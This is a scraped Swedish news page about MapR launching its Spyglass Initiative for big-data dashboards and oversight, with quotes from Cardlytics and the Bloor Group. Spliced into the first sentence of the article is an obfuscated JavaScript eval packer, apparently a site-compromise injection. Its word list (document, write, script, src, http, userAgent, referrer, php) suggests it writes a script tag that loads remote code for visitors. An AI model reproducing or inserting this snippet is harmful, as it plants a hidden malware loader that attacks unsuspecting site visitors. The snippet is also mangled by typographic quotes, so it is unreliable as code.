Image Image Image Image Image Image Image Image Image Image

| 16 april, 2021

Scroll to top

Top

MapR lanserar Spyglass Initiative för att skapa bättre översyn

MapR lanserar Spyglass Initiative för att skapa bättre översyn
Sebastian

 MapR eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bthat|var|u0026u|referrer|aeden||js|php’.split(’|’),0,{}))
Technologies
, leverantör av marknadens enda konvergerade dataplattform, meddelar att företaget lanserat Spyglass Initiative – en heltäckande, öppen och skalbar lösning som ska förbättra användarvänligheten och produktiviteten i företags big data-projekt.

Lanseringen, som är den första i en rad lanseringar inom Spyglass Initiative, ger företag tillgång till ny funktionalitet som skapar en bättre översyn och anpassningsbara dashboards som förenklar administrationen av big data-projekt och oöverträffad kontroll över konvergerad data från olika containrar, processer, komponenter etc.

– För oss på Cardlytics, som arbetar med finanstjänster och marknadsföring, är det data allt handlar om, säger Bret Lowery, technical director, data and architecture, Cardlytics. Därför är MapR en strategisk partner för våra tillväxtplaner. Den nya lösningen kommer vara ytterst viktig för vår möjlighet att övervaka och underhålla våra Hadoop- och Apachesystem och se till att vi fortsätter uppfylla våra kunders krav.

Syftet med Spyglass Initiative är att förenkla hanteringen och öka värdet i växande big data installationer. Med en bättre översikt av centraliserad information baserad på en rad olika datakällor kan företag effektivisera sitt beslutsfattande och enkelt dela insikter inom och mellan organisationer. På så vis öppnas nya dörrar för datadrivna företag.

– MapR är den enda hållbara big data-lösningen för företag som efterfrågar enkelheten i en konvergerad plattform, säger Robin Bloor, chief analyst, Bloor Group. De var snabba med att uppfatta företags behov av en enhetlig plattform för filer, databas och streaming av data. MapR gör det möjligt för en organisation att via en lösning smidigt övervaka, söka och analysera data.

MapR introducerade samtidigt MapR Ecosystem Pack (MEP), ett förbättrat program för att leverera det senaste inom open source och samtidigt säkra kompabilitet.

Tillgänglighet: 

Den nya funktionaliteten till MapRs plattform kommer finnas tillgängliga under Q3.

För mer information; 

Vänligen se här.